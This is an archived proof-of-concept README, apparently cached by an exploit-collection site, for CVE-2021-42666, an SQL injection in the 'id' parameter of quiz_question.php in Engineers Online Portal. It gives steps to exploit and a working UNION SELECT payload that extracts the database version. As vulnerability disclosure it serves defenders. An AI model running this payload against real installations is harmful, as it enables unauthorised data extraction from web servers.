Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2021-42666 PoC — Engineers Online Portal SQL注入漏洞

Source
Associated Vulnerability
Title:Engineers Online Portal SQL注入漏洞 (CVE-2021-42666)
Description:Engineers Online Portal是开源的一个在线门户。是使用PHP、MySQL 数据库、HTML、CSS、Javascript、jQuery、Ajax、Bootstrap 和一些其他库开发的。 Engineers Online Portal 存在SQL注入漏洞,该漏洞源于PHP的Sourcecodester Engineers Online Portal中通过 quiz_question.php的id参数存在一个SQL注入漏洞。攻击者可利用该漏洞从web服务器中提取敏感数据。
Description
CVE-2021-42666 - SQL Injection vulnerability in the Engineers online portal system. 
Readme
# CVE-2021-42666
CVE-2021-42666 - SQL Injection vulnerability in the Engineers online portal system. 

# Technical description:
An SQL Injection vulnerability exists in the Engineers Online Portal system. An attacker can leverage the vulnerable "id" parameter in the "quiz_question.php" web page in order to manipulate the sql query performed.
As a result he can extract sensitive data from the web server.

Affected components - 

Vulnerable page - quiz_question.php

Vulnerable parameter - "id"

# Steps to exploit:
1) Navigate to http://localhost/nia_munoz_monitoring_system/quiz_question.php
2) Insert your payload in the id parameter

# Proof of concept (Poc) -
The following payload will allow you to extract the MySql server version running on the web server -
```
' union select NULL,NULL,NULL,NULL,NULL,@@version,NULL,NULL,NULL;-- -
```

![CVE-2021-42666](https://user-images.githubusercontent.com/93016131/140187597-c512a30d-4dba-45d0-91d2-fd06d3afdafa.gif)

# References - 
https://www.exploit-db.com/exploits/50453

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42666

https://nvd.nist.gov/vuln/detail/CVE-2021-42666

# Discovered by - 
Alon Leviev(0xDeku), 22 October, 2021. 
File Snapshot

[4.0K] /data/pocs/80356c0611141d41bd7e636cbac08ca5b30f806f └── [1.2K] README.md 0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.